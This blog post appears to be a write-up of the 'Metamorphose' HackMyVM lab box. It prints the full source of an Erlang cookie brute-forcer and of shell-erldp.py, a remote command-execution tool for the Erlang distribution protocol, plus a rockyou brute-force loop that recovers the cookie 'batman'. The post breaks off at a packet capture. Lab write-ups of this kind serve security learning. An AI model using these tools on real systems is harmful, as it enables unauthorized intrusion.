{"id":769,"date":"2024-08-06T00:59:55","date_gmt":"2024-08-05T16:59:55","guid":{"rendered":"http:\/\/162.14.82.114\/?p=769"},"modified":"2024-08-06T00:59:55","modified_gmt":"2024-08-05T16:59:55","slug":"hmv-_-metamorphose","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/769\/08\/06\/2024\/","title":{"rendered":"hmv[-_-]Metamorphose"},"content":{"rendered":"<h1>Metamorphose<\/h1>\n<blockquote>\n<p>This box is hard; the experts in the group also worked on it for a long time, but unfortunately without much progress. Download it and take a look!<\/p>\n<\/blockquote>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058520.png\" alt=\"image-20240803233432197\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408060058522.png\" alt=\"image-20240804002813149\" style=\"zoom: 50%;\" \/><\/p>\n<blockquote>\n<p>&quot;Metamorphose&quot; is an English word of Greek origin meaning to undergo a thorough change or transformation, usually from one form into another. The word is often used to describe biological change, such as the process by which an insect develops from larva to adult (for example, a caterpillar becoming a butterfly). In a broader context, it can refer to a fundamental change in anything, including changes in abstract concepts or situations.<\/p>\n<p>For example:<\/p>\n<ul>\n<li>The process of metamorphic development in biology.<\/li>\n<li>The result after a person or organization has undergone a major transformation.<\/li>\n<li>The transformation of a character in a literary work.<\/li>\n<\/ul>\n<\/blockquote>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ rustscan -a $IP -- -sCV                                                                             \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. 
\\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 172.20.10.3:22\nOpen 172.20.10.3:4369\nOpen 172.20.10.3:32837\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-03 12:29 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 12:29\nCompleted NSE at 12:29, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 12:29\nCompleted NSE at 12:29, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 12:29\nCompleted NSE at 12:29, 0.00s elapsed\nInitiating Ping Scan at 12:29\nScanning 172.20.10.3 [2 ports]\nCompleted Ping Scan at 12:29, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 12:29\nCompleted Parallel DNS resolution of 1 host. at 12:29, 0.00s elapsed\nDNS resolution of 1 IPs took 0.00s. 
Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 12:29\nScanning 172.20.10.3 [3 ports]\nDiscovered open port 22\/tcp on 172.20.10.3\nDiscovered open port 32837\/tcp on 172.20.10.3\nDiscovered open port 4369\/tcp on 172.20.10.3\nCompleted Connect Scan at 12:29, 0.00s elapsed (3 total ports)\nInitiating Service scan at 12:29\nScanning 3 services on 172.20.10.3\nCompleted Service scan at 12:31, 126.23s elapsed (3 services on 1 host)\nNSE: Script scanning 172.20.10.3.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 14.02s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 1.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 0.00s elapsed\nNmap scan report for 172.20.10.3\nHost is up, received conn-refused (0.0011s latency).\nScanned at 2024-08-03 12:29:34 EDT for 142s\n\nPORT      STATE SERVICE REASON  VERSION\n22\/tcp    open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 a6:af:c3:72:91:52:e9:4d:e5:c7:7e:99:bd:15:97:fd (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCBB+SGPU+Ekda80jLZ2gWo+zrdeZoEH0HtLz8vzI+iWYhXzWkEZlkemG4xonvYNV7ykMFbwXnNf+l0mBrttDxQ=\n|   256 d8:77:85:74:f5:95:3d:0e:04:78:7d:f2:47:01:f9:98 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHvrpQCogggApAEo48N0LAdvWpL4wgAgR\/zqGJ8MA7YC\n4369\/tcp  open  epmd    syn-ack Erlang Port Mapper Daemon\n| epmd-info: \n|   epmd_port: 4369\n|   nodes: \n|_    network: 32837\n32837\/tcp open  unknown syn-ack\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 12:31\nCompleted NSE at 12:31, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 
12:31\nCompleted NSE at 12:31, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 142.35 seconds<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Script Exploitation (including trial and error)<\/h3>\n<p>Reference: <a href=\"https:\/\/book.hacktricks.xyz\/network-services-pentesting\/4369-pentesting-erlang-port-mapper-daemon-epmd\">https:\/\/book.hacktricks.xyz\/network-services-pentesting\/4369-pentesting-erlang-port-mapper-daemon-epmd<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ echo -n -e &quot;\\x00\\x01\\x6e&quot; | nc -vn $IP 4369 \n(UNKNOWN) [172.20.10.3] 4369 (epmd) open\nname network at port 32837\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ nmap -sV -Pn -n -T4 -p 4369 --script epmd-info $IP \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-03 12:42 EDT\nNmap scan report for 172.20.10.3\nHost is up (0.0011s latency).\n\nPORT     STATE SERVICE VERSION\n4369\/tcp open  epmd    Erlang Port Mapper Daemon\n| epmd-info: \n|   epmd_port: 4369\n|   nodes: \n|_    network: 32837\n\nService detection performed. 
Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 6.21 seconds\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ nmap -sCV -p- $IP                                 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-03 12:44 EDT\nStats: 0:00:56 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan\nService scan Timing: About 66.67% done; ETC: 12:45 (0:00:20 remaining)\nNmap scan report for 172.20.10.3\nHost is up (0.0021s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)\n| ssh-hostkey: \n|   256 a6:af:c3:72:91:52:e9:4d:e5:c7:7e:99:bd:15:97:fd (ECDSA)\n|_  256 d8:77:85:74:f5:95:3d:0e:04:78:7d:f2:47:01:f9:98 (ED25519)\n4369\/tcp  open  epmd    Erlang Port Mapper Daemon\n| epmd-info: \n|   epmd_port: 4369\n|   nodes: \n|_    network: 32837\n32837\/tcp open  unknown\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>Continue gathering information: <a href=\"https:\/\/github.com\/gteissier\/erl-matter\">https:\/\/github.com\/gteissier\/erl-matter<\/a><\/p>\n<p>It turns out there are leads on this cookie, so try to find a ready-made solution: <a href=\"https:\/\/insinuator.net\/2017\/10\/erlang-distribution-rce-and-a-cookie-bruteforcer\/\">https:\/\/insinuator.net\/2017\/10\/erlang-distribution-rce-and-a-cookie-bruteforcer\/<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ ls    \nepmd_bf  erldp-info.nse  wget-log\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose]\n\u2514\u2500$ cd epmd_bf          \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ ls\nebin  Emakefile  Makefile  priv  
src\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ cat src\/epmd_bf.erl   \n%  epmd_bf.erl\n%  \n%  Copyright 2017 Daniel Mende &lt;mail@c0decafe.de&gt;\n%  \n%  Redistribution and use in source and binary forms, with or without\n%  modification, are permitted provided that the following conditions are\n%  met:\n%  \n%  * Redistributions of source code must retain the above copyright\n%    notice, this list of conditions and the following disclaimer.\n%  * Redistributions in binary form must reproduce the above\n%    copyright notice, this list of conditions and the following disclaimer\n%    in the documentation and\/or other materials provided with the\n%    distribution.\n%  * Neither the name of the  nor the names of its\n%    contributors may be used to endorse or promote products derived from\n%    this software without specific prior written permission.\n%  \n%  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n%  &quot;AS IS&quot; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n%  LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n%  A PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT\n%  OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n%  SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n%  LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n%  DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n%  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n%  (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n%  OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n-module(epmd_bf).\n-author(&#039;Daniel Mende &lt;mail@c0decafe.de&gt;&#039;).\n-compile(export_all).\n\n-include_lib(&quot;kernel\/include\/dist.hrl&quot;).\n\nget_next(_, [_|[]]) -&gt;\n    stop;\nget_next(Cur, [H|T]) -&gt;\n    if\n        Cur == H -&gt;\n            lists:nth(1, T);\n        true -&gt;\n            get_next(Cur, T)\n    end.\n\nnext([], Alphabet) -&gt;\n    lists:nth(1, Alphabet);\nnext([H|T], Alphabet) -&gt;\n    case get_next(H, Alphabet) of\n        stop -&gt;\n            [lists:nth(1, Alphabet) | next(T, Alphabet)];\n        Next -&gt;\n            [Next | T]\n    end.\n\ngen_digest(Challenge, Cookie) when is_integer(Challenge), is_list(Cookie) -&gt;\n    erlang:md5([list_to_binary(Cookie)|integer_to_list(Challenge)]).\n\ntest_cookie({IP, Port}, Cookie) -&gt;\n    test_cookie({IP, Port}, Cookie, &lt;&lt;&quot;epmd_bf@baldr.local&quot;&gt;&gt;).\ntest_cookie({IP, Port}, Cookie, NodeName) -&gt;\n    io:fwrite(&quot;Testing cookie ~s~n&quot;, [Cookie]),\n    {ok, Socket} = gen_tcp:connect(IP, Port, [\n            {packet, 2},\n            {active, true},\n            {nodelay, true},\n            {reuseaddr, true},\n            binary\n        ]),\n    Identification = &lt;&lt;\n        &quot;n&quot;,\n        0,5,            % Version\n        0,7,127,253,    % Flags\n        NodeName\/bytes  % NodeName\n    &gt;&gt;,\n    ok = gen_tcp:send(Socket, Identification),\n    receive\n        {tcp, _, 
&lt;&lt;&quot;sok&quot;&gt;&gt;} -&gt; \n            receive \n                {tcp, _, &lt;&lt;&quot;n&quot;, _Version:16, _Flags:32, Challenge:32, Name\/binary&gt;&gt;} -&gt; \n                    %~ io:fwrite(&quot;Received Challenge ~p from ~s~n&quot;, [Challenge, Name]),\n                    Digest = gen_digest(Challenge, Cookie),\n                    ChallengeReply = &lt;&lt;\n                        &quot;r&quot;,\n                        0,0,0,0,    % Challenge\n                        Digest\/bytes\n                    &gt;&gt;,\n                    ok = gen_tcp:send(Socket, ChallengeReply),\n                    receive\n                        {tcp_closed, _} -&gt;\n                            failed;\n                        {tcp, _, &lt;&lt;&quot;a&quot;, _\/binary&gt;&gt;} -&gt;\n                            io:fwrite(&quot;Found cookie ~s for host ~s~n&quot;, [Cookie, Name]),\n                            success;\n                        Ret -&gt;                            \n                            io:fwrite(&quot;Received ~p~n&quot;, [Ret]),\n                            error\n                    end;\n                Ret -&gt;\n                    io:fwrite(&quot;Received ~p~n&quot;, [Ret]),\n                    error\n                end;\n        _ -&gt; error\n    end.\n\ngen_first(N, Alphabet) -&gt;\n    gen_first(N, N, Alphabet).\ngen_first(_, 0, _) -&gt;\n    [];\ngen_first(N, C, Alphabet) -&gt;\n    [lists:nth(1, Alphabet) | gen_first(N, C-1, Alphabet)].\n\nbf_cookie({IP, Port}, Alphabet, Cookie) -&gt;\n    case test_cookie({IP, Port}, Cookie) of\n        success -&gt; \n            stop;\n        failed -&gt;\n            bf_cookie({IP, Port}, Alphabet, next(Cookie, Alphabet));\n        _ -&gt;\n            stop\n    end.\n\ntest() -&gt;\n    Alphabet = lists:seq($A,$Z),\n    bf_cookie({{127,0,0,1}, 37453}, Alphabet, gen_first(20, Alphabet)).\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ vim 
src\/epmd_bf.erl\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/epmd_bf]\n\u2514\u2500$ tail src\/epmd_bf.erl \n            stop;\n        failed -&gt;\n            bf_cookie({IP, Port}, Alphabet, next(Cookie, Alphabet));\n        _ -&gt;\n            stop\n    end.\n\ntest() -&gt;\n    Alphabet = lists:seq($A,$Z),\n    bf_cookie({{172.20.10.3}, 32837}, Alphabet, gen_first(20, Alphabet)).<\/code><\/pre>\n<p>Tried to use it for exploitation, but it didn&#039;t work; try a different one:<\/p>\n<pre><code class=\"language-bash\">time .\/bruteforce-erldp --threads=16 --seed-start=381410768 --seed-end=386584488 --gap=1000 17 32837<\/code><\/pre>\n<p>That didn&#039;t work either. Later another expert published a writeup, and it turned out this script wasn&#039;t what was used; instead, the cookie was brute-forced...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ ls    \nbarrier.c           bruteforce-erldp.py   crack-hash    crack-prng.o           erldp.c         erldp.py           jsmn.h          __pycache__            shell-erldp.py\nbin-seeds.py        complete-cookie       crack-hash.c  dictionary-erldp.py    erldp.h         erldp-warning.png  jsmn.o          README.md              sweep-default-cookie.py\nbruteforce-erldp    complete-cookie.c     crack-hash.o  Docker-experiments.md  erldp-info.nse  example.dist       leaked-cookies  revert-prng.sage\nbruteforce-erldp.c  complete-cookie.o     crack-prng    Dockerfile.erlang      erldp.o         Internet-scan.md   LICENSE         sample-cookies\nbruteforce-erldp.o  complete-cookie.sage  crack-prng.c  erlang.py              erldp-proxy.py  jsmn.c             Makefile        seed-distribution.png\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ head -n 20 
leaked-cookies\n\n111222333\n123456\n3ren\n588a30cfed89e04a2f1f6f3a8d63f94e\nABCD\nABCEDEF\nAFRTY12ESS3412735ASDF12378\nC00KI3\nC00KIE\nCOOKIE\nClueCon\nCopSeesIt\nDJQWUOCYZCIZNETCXWES\nFOOBAR\nJL0{%8cFLJ{IUr?QC{dOvS]yB%fqSUewy!FTu;_HAB0b`5r;o(KgP,5;y8QF2&gt;ZT\nNDZZKSSLLQEPDAGPLIGG\nODEzMTBlZjc5ZGY5NzQwYTM3ZDkwMzEx\nOMNOMNOM\nSFEWRG34AFDSGAFG35235\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ cat shell-erldp.py    \n#!\/usr\/bin\/env python2\n\nfrom struct import pack, unpack\nfrom cStringIO import StringIO\nfrom socket import socket, AF_INET, SOCK_STREAM, SHUT_RDWR\nfrom hashlib import md5\nfrom binascii import hexlify, unhexlify\nfrom random import choice\nfrom string import ascii_uppercase\nimport sys\nimport argparse\nimport erlang as erl\n\ndef rand_id(n=6):\n  return &#039;&#039;.join([choice(ascii_uppercase) for c in range(n)]) + &#039;@nowhere&#039;\n\nparser = argparse.ArgumentParser(description=&#039;Execute shell command through Erlang distribution protocol&#039;)\n\nparser.add_argument(&#039;target&#039;, action=&#039;store&#039;, type=str, help=&#039;Erlang node address or FQDN&#039;)\nparser.add_argument(&#039;port&#039;, action=&#039;store&#039;, type=int, help=&#039;Erlang node TCP port&#039;)\nparser.add_argument(&#039;cookie&#039;, action=&#039;store&#039;, type=str, help=&#039;Erlang cookie&#039;)\nparser.add_argument(&#039;--verbose&#039;, action=&#039;store_true&#039;, help=&#039;Output decode Erlang binary term format received&#039;)\nparser.add_argument(&#039;--challenge&#039;, type=int, default=0, help=&#039;Set client challenge value&#039;)\nparser.add_argument(&#039;cmd&#039;, default=None, nargs=&#039;?&#039;, action=&#039;store&#039;, type=str, help=&#039;Shell command to execute, defaults to interactive shell&#039;)\n\nargs = parser.parse_args()\n\nname = rand_id()\n\nsock = socket(AF_INET, SOCK_STREAM, 0)\nassert(sock)\n\nsock.connect((args.target, args.port))\n\ndef send_name(name):\n  
FLAGS = (\n    0x7499c +\n    0x01000600 # HANDSHAKE_23|BIT_BINARIES|EXPORT_PTR_TAG\n  )\n  return pack(&#039;!HcQIH&#039;, 15 + len(name), &#039;N&#039;, FLAGS, 0xdeadbeef, len(name)) + name\n\nsock.sendall(send_name(name))\n\ndata = sock.recv(5)\nassert(data == &#039;\\x00\\x03\\x73\\x6f\\x6b&#039;)\n\ndata = sock.recv(4096)\n(length, tag, flags, challenge, creation, nlen) = unpack(&#039;!HcQIIH&#039;, data[:21])\nassert(tag == &#039;N&#039;)\nassert(nlen + 19 == length)\nchallenge = &#039;%u&#039; % challenge\n\ndef send_challenge_reply(cookie, challenge):\n  m = md5()\n  m.update(cookie)\n  m.update(challenge)\n  response = m.digest()\n  return pack(&#039;!HcI&#039;, len(response)+5, &#039;r&#039;, args.challenge) + response\n\nsock.sendall(send_challenge_reply(args.cookie, challenge))\n\ndata = sock.recv(3)\nif len(data) == 0:\n  print(&#039;wrong cookie, auth unsuccessful&#039;)\n  sys.exit(1)\nelse:\n  assert(data == &#039;\\x00\\x11\\x61&#039;)\n  digest = sock.recv(16)\n  assert(len(digest) == 16)\n\nprint(&#039;[*] authenticated onto victim&#039;)\n\n# Once connected, protocol between us and victim is described\n# at http:\/\/erlang.org\/doc\/apps\/erts\/erl_dist_protocol.html#protocol-between-connected-nodes\n# it is roughly a variant of erlang binary term format\n# the format also depends on the version of ERTS post (incl.) 
or pre 5.7.2\n# the format used here is based on pre 5.7.2, the old one\n\ndef erl_dist_recv(f):\n  hdr = f.recv(4)\n  if len(hdr) != 4: return\n  (length,) = unpack(&#039;!I&#039;, hdr)\n  data = f.recv(length)\n  if len(data) != length: return\n\n  # remove 0x70 from head of stream\n  data = data[1:]\n\n  while data:\n    (parsed, term) = erl.binary_to_term(data)\n    if parsed &lt;= 0:\n      print(&#039;failed to parse erlang term, may need to peek into it&#039;)\n      break\n\n    yield term\n\n    data = data[parsed:]\n\ndef encode_string(name, type=0x64):\n  return pack(&#039;!BH&#039;, type, len(name)) + name\n\ndef send_cmd_old(name, cmd):\n  data = (unhexlify(&#039;70836804610667&#039;) + \n    encode_string(name) + \n    unhexlify(&#039;0000000300000000006400006400037265&#039;) +\n    unhexlify(&#039;7883680267&#039;) + \n    encode_string(name) + \n    unhexlify(&#039;0000000300000000006805&#039;) +\n    encode_string(&#039;call&#039;) +\n    encode_string(&#039;os&#039;) +\n    encode_string(&#039;cmd&#039;) +\n    unhexlify(&#039;6c00000001&#039;) + \n    encode_string(cmd, 0x6b) + \n    unhexlify(&#039;6a&#039;) + \n    encode_string(&#039;user&#039;))\n\n  return pack(&#039;!I&#039;, len(data)) + data\n\ndef send_cmd(name, cmd):\n  # REG_SEND control message\n  ctrl_msg = (6,\n    erl.OtpErlangPid(erl.OtpErlangAtom(name),&#039;\\x00\\x00\\x00\\x03&#039;,&#039;\\x00\\x00\\x00\\x00&#039;,&#039;\\x00&#039;),\n    erl.OtpErlangAtom(&#039;&#039;),\n    erl.OtpErlangAtom(&#039;rex&#039;))\n  msg = (\n    erl.OtpErlangPid(erl.OtpErlangAtom(name),&#039;\\x00\\x00\\x00\\x03&#039;,&#039;\\x00\\x00\\x00\\x00&#039;,&#039;\\x00&#039;),\n    (\n      erl.OtpErlangAtom(&#039;call&#039;),\n      erl.OtpErlangAtom(&#039;os&#039;),\n      erl.OtpErlangAtom(&#039;cmd&#039;),\n      [cmd],\n      erl.OtpErlangAtom(&#039;user&#039;)\n    ))\n\n  new_data = &#039;\\x70&#039; + erl.term_to_binary(ctrl_msg) + erl.term_to_binary(msg)\n\n  return pack(&#039;!I&#039;, 
len(new_data)) + new_data\n\ndef recv_reply(f):\n  terms = [t for t in erl_dist_recv(f)]\n  if args.verbose:\n    print(&#039;\\nreceived %r&#039; % (terms))\n\n  assert(len(terms) == 2)\n  answer = terms[1]\n  assert(len(answer) == 2)\n  return answer[1]\n\nif not args.cmd:\n  while True:\n    try:\n      cmd = raw_input(&#039;%s:%d $ &#039; % (args.target, args.port))\n    except EOFError:\n      print(&#039;&#039;)\n      break\n\n    sock.sendall(send_cmd(name, cmd))\n\n    reply = recv_reply(sock)\n    sys.stdout.write(reply)\nelse:\n  sock.sendall(send_cmd(name, args.cmd))\n\n  reply = recv_reply(sock)\n  sys.stdout.write(reply)\n\nprint(&#039;[*] disconnecting from victim&#039;)\nsock.close()\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py\nusage: shell-erldp.py [-h] [--verbose] [--challenge CHALLENGE]\n                      target port cookie [cmd]\nshell-erldp.py: error: too few arguments\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ echo -n -e &quot;\\x00\\x01\\x6e&quot; | nc -vn $IP 4369\n(UNKNOWN) [172.20.10.3] 4369 (epmd) open\nname network at port 40121<\/code><\/pre>\n<p>Try brute-forcing it. The weak cookies bundled with the tool didn&#039;t work, so try the first thousand entries of rockyou:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ head -n 1000 \/usr\/share\/wordlists\/rockyou.txt &gt; rockyou_top1000.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ for i in $(cat .\/rockyou_top1000.txt); do if ! 
python2 shell-erldp.py 172.20.10.3 40121 &quot;$i&quot; whoami 2&gt;&amp;1 | grep -q &quot;wrong cookie, auth unsuccessful&quot;; then echo &quot;[+] cookie:$i&quot;; break; fi; done\n[+] cookie:batman<\/code><\/pre>\n<p>Found the cookie; try logging in with it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ python2 shell-erldp.py 172.20.10.3 40121 batman whoami \n[*] authenticated onto victim\nTraceback (most recent call last):\n  File &quot;shell-erldp.py&quot;, line 172, in &lt;module&gt;\n    reply = recv_reply(sock)\n  File &quot;shell-erldp.py&quot;, line 147, in recv_reply\n    terms = [t for t in erl_dist_recv(f)]\n  File &quot;shell-erldp.py&quot;, line 94, in erl_dist_recv\n    (parsed, term) = erl.binary_to_term(data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 421, in binary_to_term\n    i, term = _binary_to_term(1, data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 505, in _binary_to_term\n    i, tuple_value = _binary_to_term_sequence(i, length, data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 630, in _binary_to_term_sequence\n    i, element = _binary_to_term(i, data)\n  File &quot;\/home\/kali\/temp\/Metamorphose\/erl-matter\/erlang.py&quot;, line 625, in _binary_to_term\n    raise ParseException(&#039;invalid tag&#039;)\nerlang.ParseException: invalid tag<\/code><\/pre>\n<p>Asked ChatGPT about it, and found:<\/p>\n<blockquote>\n<p>Based on the error message provided, this exception is raised while trying to parse data received over the Erlang Distribution Protocol (erldp). The error <code>erlang.ParseException: invalid tag<\/code> indicates that an unrecognized data tag was encountered during parsing.<\/p>\n<p>Here are several possible causes and solutions:<\/p>\n<ol>\n<li><strong>Data format issue<\/strong>:\n<ul>\n<li>Make sure the sender is sending valid Erlang terms (e.g. tuples, lists, atoms) and that these terms are correctly encoded in binary format.<\/li>\n<li>Check whether the sender is using the correct version of the Erlang distribution protocol and that the receiving end can understand that version.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Network transmission issue<\/strong>:\n<ul>\n<li>Data may be corrupted or truncated during network transmission. Make sure the network connection is stable and reliable.<\/li>\n<li>If UDP or another unreliable protocol is used, make sure all packets have been received in full.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Code implementation issue<\/strong>:\n<ul>\n<li>In the <code>_binary_to_term<\/code> function in <code>erl-matter\/erlang.py<\/code>, a <code>ParseException<\/code> is thrown when an unknown or unsupported data type is encountered. Check that function to learn which tags are supported and which tags cause this exception.<\/li>\n<li>Confirm whether the <code>_binary_to_term<\/code> and <code>_binary_to_term_sequence<\/code> functions correctly handle all possible data structures and tags.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Debugging suggestions<\/strong>:\n<ul>\n<li>Add debug output in the <code>recv_reply<\/code> and <code>erl_dist_recv<\/code> functions to print the raw data received, so you can check whether the data matches expectations.<\/li>\n<li>Check the sender&#039;s code logic to make sure it constructs the data correctly according to Erlang&#039;s binary term format.<\/li>\n<li>If possible, use Erlang&#039;s built-in tools for testing, such as <code>net_adm:ping\/1<\/code>, to confirm that the receiving end can communicate correctly with Erlang nodes.<\/li>\n<\/ul>\n<\/li>\n<li><strong>Version compatibility issue<\/strong>:\n<ul>\n<li>If your code depends on a specific version of Erlang, make sure the Erlang versions used by the client and the server are compatible.<\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<\/blockquote>\n<p>Try capturing the traffic to take a look:<\/p>\n<blockquote>\n<p>-vvv: produces even more verbose output than -vv.<\/p>\n<p>-XX: outputs the packet header data, in both hex and ASCII at the same time.<\/p>\n<p>-nn: shows IPs and port numbers directly instead of host names and service names.<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Metamorphose\/erl-matter]\n\u2514\u2500$ sudo tcpdump -i eth1 host 172.20.10.3 
